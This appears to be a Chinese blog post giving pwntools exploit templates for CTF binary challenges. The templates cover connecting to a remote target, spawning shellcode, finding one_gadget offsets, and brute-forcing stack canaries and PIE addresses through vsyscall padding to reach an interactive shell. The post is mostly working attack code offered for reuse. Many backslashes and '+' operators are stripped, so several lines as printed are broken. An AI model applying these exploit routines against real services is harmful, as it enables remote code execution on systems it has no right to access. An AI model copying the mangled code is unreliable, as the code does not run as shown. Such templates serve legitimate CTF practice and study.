Pwn-EXP模板

2020-11-04 10:33:02 浏览数 (3)

EXP Template

代码语言:javascript复制
#coding:utf-8
import sys
from pwn import *
from one_gadget import generate_one_gadget
# context.terminal = ["tmux","splitw","-h"]
context.terminal = ["tmux","new-window"]
context.log_level = "debug"

### 远程本地连接
def ProLoc(elf_addr,libc_addr,pro_libc):
    global sh,elf,libc,one_ggs
    if len(sys.argv) > 1 :
        ip = sys.argv[1]
        prot = sys.argv[2]
        sh = remote(ip,prot)
        libc = pro_libc
    else:
        sh = process(elf_addr) 
    elf = ELF(elf_addr)
    libc = ELF(libc_addr)
    one_ggs = one_gadget(libc_addr)
### GDB调试
def debug(cmd=""):
    if len(sys.argv) == 1:
        gdb.attach(sh,cmd)
### Shell_code
def shell_code(fw):
    if fw == 32:
        return asm(shellcraft.sh())
    elif fw == 64:
        return asm(shellcraft.amd64.linux.sh())
### One_Gadget
def one_gadget(libc_addr):
    log.progress("Leak One_Gadgets...")
    path_to_libc=libc_addr
    gadget =[]
    for offset in generate_one_gadget(path_to_libc):
        gadget.append(int(offset))
    return gadget
    #one_gg = one_gadget("/lib/x86_64-linux-gnu/libc.so.6")

def exp():
    success("info_success")								# 正确提示信息
    info("info_info")									# 提示信息
    info.progress("info_progress")						# 加载信息
    debug()												# 加载GDB调试
   	"""
   	...EXP...
   	
   	"""
    sh.interactive()
    
if __name__=="__main__":
    elf_addr = "./babyheap"                             # 本地ELF
    libc_addr = "/lib/x86_64-linux-gnu/libc.so.6"       # Libc文件
    pro_libc = ""										# 远程Libc文件
    ProLoc(elf_addr,libc_addr,pro_libc)
    exp()
代码语言:javascript复制
➜  DA1SY python exp.py  									<= 本地
➜  DA1SY python exp.py 192.168.10.10 22520 					<= 远程 [Ip Port]

Stack ExpTemplate

Blasting Canary

代码语言:javascript复制
### blasting_Canary
def blasting_canary(offset,input_prompt,fw):
    #距离canary的偏移量,输入提示,架构
    sh.recvuntil(input_prompt 'n')
    canary = 'x00'
    if fw =="32":
        for_num = 3
    else:
        for_num = 7
    for k in range(for_num):
        for i in range(256):
            success("Canary ->" canary)
            log.info("-------------   No."   str(k)   ":"   chr(i) "   -------------")
            #gdb.attach(sh)
            sh.send('A'*offset   canary   chr(i))
            recv = sh.recvuntil(input_prompt "n")
            if "stack smashing detected" in recv:
                continue
            else:
                canary  = chr(i)
                success("Canary =>" canary)
                break
    return canary

# canary = blasting_canary(0x70-0x8,"Hello,Pwner!","64")

Blasting_PIE

代码语言:javascript复制
### blasting_PIE
def blasting_pie(last_1,last_2_1,tips):
    # 固定的最后1字节,固定的第3位,接收信息提示
    last_2 = ["x0" last_2_1,"x1" last_2_1,"x2" last_2_1,"x3" last_2_1,"x4" last_2_1,"x5" last_2_1,"x6" last_2_1,"x7" last_2_1,"x8" last_2_1,"x9" last_2_1,"xa" last_2_1,"xb" last_2_1,"xc" last_2_1,"xd" last_2_1,"xe" last_2_1,"xf" last_2_1]
    vsyscall = 0xffffffffff600000
    for k in range(200):
        log.info("Blow up the end of PIE No." str(k))
        for i in last_2:
            payload = "A"*(0x70-0x8)   canary
            payload  = p64(vsyscall)*k last_1 i
            try:  
                #gdb.attach(sh)
                sh.send(payload)
                recv = sh.recvline()
                if tips in recv :
                    continue
                else:
                    sh.interactive()
                    break
            except KeyboardInterrupt:
                #当程序卡住不动时,CTRL C
                sh.interactive()
            except:
                continue
                
# blasting_pie("x33","xa","hello")

Heap ExpTemplate

0 人点赞